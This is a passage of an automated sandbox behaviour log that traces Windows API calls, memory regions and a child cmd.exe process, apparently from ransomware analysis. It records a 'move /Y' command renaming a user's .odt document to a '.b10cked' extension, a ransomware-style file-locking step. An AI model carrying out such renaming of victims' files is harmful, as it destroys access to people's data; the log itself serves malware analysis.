0x1 [0139.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.535] WriteFile (in: hFile=0x4c, lpBuffer=0x16f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f370*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.535] GetFileType (hFile=0x4c) returned 0x1 [0139.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.535] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: 
lpBuffer=0x16f3c0*, lpNumberOfBytesWritten=0x16e3c4*=0x20, lpOverlapped=0x0) returned 1 [0139.535] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.535] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e3b0 | out: lpNewFilePointer=0x0) returned 1 [0139.535] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.535] ReadFile (in: hFile=0x54, lpBuffer=0x16f1e0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e3d0, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesRead=0x16e3d0*=0x200, lpOverlapped=0x0) returned 1 [0139.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.536] GetFileType (hFile=0x4c) returned 0x1 [0139.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.536] GetFileType (hFile=0x4c) returned 0x1 [0139.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.536] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.536] GetFileType (hFile=0x4c) returned 0x1 [0139.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.536] WriteFile (in: hFile=0x4c, lpBuffer=0x16f230*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f230*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.536] GetFileType (hFile=0x4c) returned 0x1 [0139.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.536] WriteFile (in: hFile=0x4c, lpBuffer=0x16f280*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f280*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.536] GetFileType (hFile=0x4c) returned 0x1 [0139.536] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0139.536] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f2d0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.536] GetFileType (hFile=0x4c) returned 0x1 [0139.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.536] WriteFile (in: hFile=0x4c, lpBuffer=0x16f320*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f320*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.536] GetFileType (hFile=0x4c) returned 0x1 [0139.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.536] WriteFile (in: hFile=0x4c, lpBuffer=0x16f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f370*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.536] GetFileType (hFile=0x4c) returned 0x1 [0139.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.536] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f3c0*, lpNumberOfBytesWritten=0x16e3c4*=0x20, lpOverlapped=0x0) returned 1 [0139.536] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.536] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e3b0 | out: lpNewFilePointer=0x0) returned 1 [0139.536] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.536] ReadFile (in: hFile=0x54, lpBuffer=0x16f1e0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e3d0, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesRead=0x16e3d0*=0x32, lpOverlapped=0x0) returned 1 [0139.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.537] 
GetFileType (hFile=0x4c) returned 0x1 [0139.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.537] GetFileType (hFile=0x4c) returned 0x1 [0139.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.537] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1e0*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesWritten=0x16e3c4*=0x32, lpOverlapped=0x0) returned 1 [0139.537] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.537] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e3b0 | out: lpNewFilePointer=0x0) returned 1 [0139.537] _close (_FileHandle=4) returned 0 [0139.537] FindNextFileW (in: hFindFile=0x240e78, lpFindFileData=0x16f444 | out: lpFindFileData=0x16f444) returned 0 [0139.537] GetLastError () returned 0x12 [0139.537] FindClose (in: hFindFile=0x240e78 | out: hFindFile=0x240e78) returned 1 [0139.538] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0139.551] _close (_FileHandle=3) returned 0 [0139.551] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.551] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0139.551] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.551] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0139.552] _get_osfhandle (_FileHandle=0) returned 0x3 [0139.552] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0139.552] SetConsoleInputExeNameW () returned 0x1 [0139.552] GetConsoleOutputCP () returned 0x1b5 [0139.552] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0139.552] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.552] exit (_Code=0) Process: id = "164" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ac0" os_pid = "0xe60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = 
"9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\EGB3US~1.ODT\" \"C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14792 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14793 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14794 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14795 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 14796 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14797 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14798 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14799 start_va = 0x7ffb0000 end_va = 0x7ffd2fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14800 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 14801 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15762 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15763 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15764 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15765 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 15766 start_va = 0x580000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 15767 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15768 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15769 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15770 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 
region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15771 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15772 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15773 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15774 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15775 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15776 start_va = 0x200000 end_va = 0x2c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 15777 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15778 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15779 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 15780 start_va = 
0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 15781 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 15782 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 15783 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 15784 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 15785 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Thread: id = 221 os_tid = 0xe5c [0140.625] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f8f4 | out: lpSystemTimeAsFileTime=0x18f8f4*(dwLowDateTime=0x8dbfe080, dwHighDateTime=0x1d440a9)) [0140.625] GetCurrentProcessId () returned 0xe60 [0140.625] GetCurrentThreadId () returned 0xe5c [0140.625] GetTickCount () returned 0x2c235 [0140.625] QueryPerformanceCounter (in: lpPerformanceCount=0x18f8ec | out: lpPerformanceCount=0x18f8ec*=19741643602) returned 1 [0140.628] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0140.628] __set_app_type (_Type=0x1) [0140.628] __p__fmode () returned 0x76b331f4 [0140.628] __p__commode () returned 0x76b331fc [0140.628] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0140.628] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0140.629] GetCurrentThreadId () returned 0xe5c [0140.629] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe5c) returned 0x38 [0140.629] 
GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.629] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0140.629] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.629] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.629] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f884 | out: phkResult=0x18f884*=0x0) returned 0x2 [0140.629] VirtualQuery (in: lpAddress=0x18f8bb, lpBuffer=0x18f854, dwLength=0x1c | out: lpBuffer=0x18f854*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.629] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f854, dwLength=0x1c | out: lpBuffer=0x18f854*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.629] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f854, dwLength=0x1c | out: lpBuffer=0x18f854*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.629] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f854, dwLength=0x1c | out: lpBuffer=0x18f854*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.629] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f854, dwLength=0x1c | out: lpBuffer=0x18f854*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0140.629] GetConsoleOutputCP () returned 0x1b5 [0140.630] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.630] 
SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0140.630] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.630] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.630] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.630] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.630] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.630] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.630] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.630] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.631] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.631] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.631] GetEnvironmentStringsW () returned 0x300168* [0140.631] FreeEnvironmentStringsW (penv=0x300168) returned 1 [0140.631] GetEnvironmentStringsW () returned 0x300168* [0140.631] FreeEnvironmentStringsW (penv=0x300168) returned 1 [0140.631] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e7f4 | out: phkResult=0x18e7f4*=0x40) returned 0x0 [0140.631] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e7fc, lpData=0x18e800, lpcbData=0x18e7f8*=0x1000 | out: lpType=0x18e7fc*=0x0, lpData=0x18e800*=0x90, lpcbData=0x18e7f8*=0x1000) returned 0x2 [0140.631] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e7fc, lpData=0x18e800, lpcbData=0x18e7f8*=0x1000 | out: lpType=0x18e7fc*=0x4, lpData=0x18e800*=0x1, lpcbData=0x18e7f8*=0x4) returned 0x0 [0140.631] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e7fc, lpData=0x18e800, lpcbData=0x18e7f8*=0x1000 | out: lpType=0x18e7fc*=0x0, lpData=0x18e800*=0x1, lpcbData=0x18e7f8*=0x1000) returned 0x2 [0140.631] RegQueryValueExW (in: hKey=0x40, 
lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e7fc, lpData=0x18e800, lpcbData=0x18e7f8*=0x1000 | out: lpType=0x18e7fc*=0x4, lpData=0x18e800*=0x0, lpcbData=0x18e7f8*=0x4) returned 0x0 [0140.632] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e7fc, lpData=0x18e800, lpcbData=0x18e7f8*=0x1000 | out: lpType=0x18e7fc*=0x4, lpData=0x18e800*=0x40, lpcbData=0x18e7f8*=0x4) returned 0x0 [0140.632] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e7fc, lpData=0x18e800, lpcbData=0x18e7f8*=0x1000 | out: lpType=0x18e7fc*=0x4, lpData=0x18e800*=0x40, lpcbData=0x18e7f8*=0x4) returned 0x0 [0140.632] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e7fc, lpData=0x18e800, lpcbData=0x18e7f8*=0x1000 | out: lpType=0x18e7fc*=0x0, lpData=0x18e800*=0x40, lpcbData=0x18e7f8*=0x1000) returned 0x2 [0140.632] RegCloseKey (hKey=0x40) returned 0x0 [0140.632] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e7f4 | out: phkResult=0x18e7f4*=0x40) returned 0x0 [0140.632] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e7fc, lpData=0x18e800, lpcbData=0x18e7f8*=0x1000 | out: lpType=0x18e7fc*=0x0, lpData=0x18e800*=0x40, lpcbData=0x18e7f8*=0x1000) returned 0x2 [0140.632] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e7fc, lpData=0x18e800, lpcbData=0x18e7f8*=0x1000 | out: lpType=0x18e7fc*=0x4, lpData=0x18e800*=0x1, lpcbData=0x18e7f8*=0x4) returned 0x0 [0140.632] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e7fc, lpData=0x18e800, lpcbData=0x18e7f8*=0x1000 | out: lpType=0x18e7fc*=0x0, lpData=0x18e800*=0x1, lpcbData=0x18e7f8*=0x1000) returned 0x2 [0140.632] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e7fc, 
lpData=0x18e800, lpcbData=0x18e7f8*=0x1000 | out: lpType=0x18e7fc*=0x4, lpData=0x18e800*=0x0, lpcbData=0x18e7f8*=0x4) returned 0x0 [0140.632] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e7fc, lpData=0x18e800, lpcbData=0x18e7f8*=0x1000 | out: lpType=0x18e7fc*=0x4, lpData=0x18e800*=0x9, lpcbData=0x18e7f8*=0x4) returned 0x0 [0140.632] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e7fc, lpData=0x18e800, lpcbData=0x18e7f8*=0x1000 | out: lpType=0x18e7fc*=0x4, lpData=0x18e800*=0x9, lpcbData=0x18e7f8*=0x4) returned 0x0 [0140.632] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e7fc, lpData=0x18e800, lpcbData=0x18e7f8*=0x1000 | out: lpType=0x18e7fc*=0x0, lpData=0x18e800*=0x9, lpcbData=0x18e7f8*=0x1000) returned 0x2 [0140.632] RegCloseKey (hKey=0x40) returned 0x0 [0140.632] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636f [0140.632] srand (_Seed=0x5b88636f) [0140.632] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\EGB3US~1.ODT\" \"C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt.b10cked\"" [0140.632] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\EGB3US~1.ODT\" \"C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt.b10cked\"" [0140.632] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.633] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3018c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0140.633] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.633] GetEnvironmentVariableW (in: 
lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.633] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.633] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.633] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.633] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.633] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.633] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.633] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.633] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.633] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.633] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.633] GetEnvironmentStringsW () returned 0x3022b8* [0140.634] FreeEnvironmentStringsW (penv=0x3022b8) returned 1 [0140.634] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.634] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.634] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.634] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.634] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.634] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.634] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.634] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.634] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.634] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.634] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f5c0 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.634] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f5c0, lpFilePart=0x18f5bc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f5bc*="Desktop") returned 0x18 [0140.634] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.634] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f33c | out: lpFindFileData=0x18f33c) returned 0x2ffff8 [0140.634] FindClose (in: hFindFile=0x2ffff8 | out: hFindFile=0x2ffff8) returned 1 [0140.634] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f33c | out: lpFindFileData=0x18f33c) returned 0x2ffff8 [0140.635] FindClose (in: hFindFile=0x2ffff8 | out: hFindFile=0x2ffff8) returned 1 [0140.635] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f33c | out: lpFindFileData=0x18f33c) returned 0x2ffff8 [0140.635] FindClose (in: hFindFile=0x2ffff8 | out: hFindFile=0x2ffff8) returned 1 [0140.635] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.635] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0140.635] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0140.635] GetEnvironmentStringsW () returned 0x302ad8* [0140.635] FreeEnvironmentStringsW (penv=0x302ad8) returned 1 